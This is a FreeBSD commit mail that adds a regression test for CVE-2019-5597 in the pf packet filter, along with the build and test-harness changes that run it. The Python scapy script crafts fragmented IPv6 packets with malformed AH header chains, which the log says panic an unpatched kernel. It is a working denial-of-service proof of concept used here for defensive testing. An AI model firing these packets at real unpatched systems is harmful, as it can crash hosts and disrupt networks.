Date: Tue, 5 Mar 2019 08:45:07 +0000 (UTC) From: Kristof Provost <kp@FreeBSD.org> To: src-committers@freebsd.org, svn-src-all@freebsd.org, svn-src-stable@freebsd.org, svn-src-stable-12@freebsd.org Subject: svn commit: r344793 - stable/12/tests/sys/netpfil/pf Message-ID: <201903050845.x258j7T2035155@repo.freebsd.org>
next in thread | raw e-mail | index | archive | help
Author: kp Date: Tue Mar 5 08:45:07 2019 New Revision: 344793 URL: https://svnweb.freebsd.org/changeset/base/344793 Log: MFC r344692: pf tests: Test CVE-2019-5597 Generate a fragmented packet with different header chains, to provoke the incorrect behaviour of pf. Without the fix this will trigger a panic. Obtained from: Corentin Bayet, Nicolas Collignon, Luca Moro at Synacktiv Added: stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py - copied unchanged from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py Modified: stable/12/tests/sys/netpfil/pf/Makefile stable/12/tests/sys/netpfil/pf/fragmentation.sh Directory Properties: stable/12/ (props changed) Copied: stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py (from r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py) ============================================================================== --- /dev/null 00:00:00 1970 (empty, because file is newly added) +++ stable/12/tests/sys/netpfil/pf/CVE-2019-5597.py Tue Mar 5 08:45:07 2019 (r344793, copy of r344692, head/tests/sys/netpfil/pf/CVE-2019-5597.py) @@ -0,0 +1,35 @@ +#!/usr/local/bin/python2.7 + +import random +import scapy.all as sp +import sys + +UDP_PROTO = 17 +AH_PROTO = 51 +FRAG_PROTO = 44 + +def main(): + intf = sys.argv[1] + ipv6_src = sys.argv[2] + ipv6_dst = sys.argv[3] + + ipv6_main = sp.IPv6(dst=ipv6_dst, src=ipv6_src) + + padding = 8 + fid = random.randint(0,100000) + frag_0 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=1, offset=0) + frag_1 = sp.IPv6ExtHdrFragment(id=fid, nh=UDP_PROTO, m=0, offset=padding/8) + + pkt1_opts = sp.AH(nh=AH_PROTO, payloadlen=200) \ + / sp.Raw('XXXX' * 199) \ + / sp.AH(nh=FRAG_PROTO, payloadlen=1) \ + / frag_1 + + pkt0 = sp.Ether() / ipv6_main / frag_0 / sp.Raw('A' * padding) + pkt1 = sp.Ether() / ipv6_main / pkt1_opts / sp.Raw('B' * padding) + + sp.sendp(pkt0, iface=intf, verbose=False) + sp.sendp(pkt1, iface=intf, verbose=False) + +if __name__ == '__main__': + main() Modified: stable/12/tests/sys/netpfil/pf/Makefile ============================================================================== --- stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:33:14 2019 (r344792) +++ stable/12/tests/sys/netpfil/pf/Makefile Tue Mar 5 08:45:07 2019 (r344793) @@ -19,8 +19,10 @@ ATF_TESTS_SH+= anchor \ ${PACKAGE}FILES+= utils.subr \ echo_inetd.conf \ - pft_ping.py + pft_ping.py \ + CVE-2019-5597.py ${PACKAGE}FILESMODE_pft_ping.py= 0555 +${PACKAGE}FILESMODE_CVE-2019-5597.py= 0555 .include <bsd.test.mk> Modified: stable/12/tests/sys/netpfil/pf/fragmentation.sh ============================================================================== --- stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:33:14 2019 (r344792) +++ stable/12/tests/sys/netpfil/pf/fragmentation.sh Tue Mar 5 08:45:07 2019 (r344793) @@ -104,6 +104,11 @@ v6_body() atf_check -s exit:0 -o ignore\ ping6 -c 1 -b 70000 -s 65000 2001:db8:43::3 + + $(atf_get_srcdir)/CVE-2019-5597.py \ + ${epair_send}a \ + 2001:db8:42::1 \ + 2001:db8:43::3 } v6_cleanup()
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?201903050845.x258j7T2035155>